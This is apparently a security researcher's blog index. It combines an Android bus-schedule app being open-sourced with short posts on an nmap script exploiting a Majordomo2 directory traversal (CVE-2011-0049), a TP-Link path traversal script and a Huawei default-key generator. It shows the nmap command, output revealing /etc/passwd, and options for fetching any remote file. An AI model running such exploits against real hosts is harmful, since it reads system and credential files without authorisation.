BCBus is an Android application I developed to have BCTransit's schedules on my phone for offline access. BCBus is my first Android project and a very important part of my learning experience with the Android OS as I had to play around with layouts, intents, async tasks, row views, sqlite interaction and memory optimization.
I've been living in México for over a year now and I simply no longer have the required time to maintain and update this application. For this reason I'd like to share the code with the world and maybe someone will find it useful and learn from it. I also encourage anyone who might be interested in picking up this project to reach out to me for more information.
Existing paid users
Since it wouldn't be fair to you, I will keep up to date the schedules of your current cities. Please contact me to let me know if you are having issues with some of the schedules.
I wrote a NSE script to exploit a path traversal vulnerability in several TP-Link access points.
This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it
nmap -p80 --script http-majordomo2-dir-traversal <host/ip>
PORT STATE SERVICE
80/tcp open http syn-ack | http-majordomo2-dir-traversal: /etc/passwd was found: | | root:x:0:0:root:/root:/bin/bash | bin:x:1:1:bin:/bin:/sbin/nologin
- http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
- http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
- http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.
I created a small web application that uses Bing's results to list all the hostnames pointing to an IP address. This is useful for pentesting services like HTTP servers that behave according to the hostname used. Don't abuse it ;)
We are proud to release our WEP/WPA default key generator for Huawei HG520x and HG530 Gateways. These devices use a weak cipher to generate their default keys and Humberto Ochoa, one of our vulnerability researchers at Websec, did a great job deciphering the algorithm:
Ironically, Prodigy Telmex, the biggest ISP in Mexico, just replaced my old 2wire router with one of these vulnerable modems, a newer and "better" device (According to their technician of course hehe).